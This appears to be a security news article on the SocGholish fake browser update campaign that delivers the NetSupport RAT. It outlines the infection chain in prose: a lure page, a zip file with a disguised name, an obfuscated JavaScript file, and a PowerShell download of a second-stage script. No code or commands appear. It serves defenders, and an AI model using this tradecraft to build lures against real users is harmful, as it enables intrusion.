Cyble Research & Intelligence Labs noticed threat actors using Fake Browser Update, SocGholish to deliver the NetSupport RAT.
SocGholish is active since 2017. It is a JavaScript malware framework where “Soc” refers to the use of social engineering toolkits masquerading as software updates to deploy malware on a victim’s system
Researchers pointed out that this malware campaign uses various ‘Social Engineering’ themes that imitate browser and program updates which include Chrome/Firefox, Flash Player, and Microsoft Teams.
The threat actors allegedly lured users to a Chrome update using a drive-by-download mechanism. Attackers host a malicious website (the site displays content to lure end-users with critical browser updates) implements drive-by-download mechanism to download an archive file that contains malware.
Once downloaded, the threat actor deployed an array of trojan and malware attacks, such as Cobalt Strike framework, ransomware, and others.
Upon clicking the “Update” button on the fake page, an archive file named “Сhrome.Updаte.zip” is downloaded and saved in the “Downloads” folder. Also, downloaded zip archive file contains a heavily-obfuscated JavaScript file named “AutoUpdater.js”.
Researchers say after the execution of the JavaScript file, it launches a PowerShell command to download and execute an additional PowerShell script from the remote server.
NetSupport Manager is a commercially available RAT (Remote Administration Tool) used for legitimate reasons that gives administrators remote access to user’s computers. But TAs utilizes NetSupport Manager as their primary tool to target victims using remote access.
NetSupport RAT malware package dropped under the %AppData% directory
It is always worthwhile to confirm whether the downloaded content originated from a legitimate source and not from any suspicious sites.
Recommendations
Download Free SWG – Secure Web Filtering – E-book
The Cactus ransomware gang has been exploiting vulnerable Qlik sense servers ever since November 2023…
Autodesk Drive is a data-sharing platform for organizations to share documents and files in the…
The Iranian state-sponsored threat actor MuddyWater has been observed exploiting a legitimate remote monitoring and…
Hackers often target WordPress plugins as they have security loopholes that they can exploit to…
In a significant move for tech enthusiasts and historians alike, Microsoft has made the source…
Progress addressed a critical vulnerability last week, which was associated with an unauthenticated Command injection…